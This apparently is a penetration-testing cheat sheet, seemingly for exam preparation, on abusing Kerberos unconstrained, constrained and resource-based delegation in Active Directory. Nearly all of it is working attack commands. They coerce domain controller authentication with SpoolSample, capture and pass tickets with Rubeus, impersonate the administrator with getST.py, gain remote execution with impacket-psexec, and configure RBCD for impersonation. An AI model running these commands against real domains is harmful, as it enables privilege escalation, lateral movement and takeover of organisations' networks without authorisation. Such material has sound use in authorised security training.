Constrained & Unconstrained Delegation
Active Directory
Overview
Abusing Kerberos delegation for privilege escalation and lateral movement.
Cheatsheet
Find Delegation
# Unconstrained
Get-DomainComputer -Unconstrained    # Find unconstrained delegation
# Constrained
Get-DomainUser -TrustedToAuth        # Find constrained delegation (users)
Get-DomainComputer -TrustedToAuth    # Find constrained delegation (computers)
Unconstrained Delegation
# Coerce auth (PrinterBug)
SpoolSample.exe DC attacker-machine    # Trigger auth from DC
# Capture TGT with Rubeus
Rubeus.exe monitor /interval:1         # Monitor for TGTs
# Use DC TGT
Rubeus.exe ptt /ticket:base64ticket    # Pass-the-Ticket
Constrained Delegation
# Request service ticket
getST.py -spn cifs/target -impersonate administrator domain/user:pass    # Abuse constrained delegation
export KRB5CCNAME=admin.ccache        # Set ticket
impacket-psexec -k -no-pass target    # Auth with ticket
Resource-Based (RBCD)
# Need GenericWrite on target
impacket-rbcd domain/user:pass -action write -delegate-to TARGET$ -delegate-from YOURPC$    # Configure RBCD
getST.py -spn cifs/target -impersonate admin domain/yourpc$:pass    # Abuse RBCD to impersonate admin
Command Examples
Common Pitfalls
- Need local admin on unconstrained host
- Constrained delegation has service restrictions
- RBCD requires write access to target
Exam Survival Tips
- Check BloodHound for delegation
- PrinterBug/PetitPotam for unconstrained
- RBCD is powerful with write access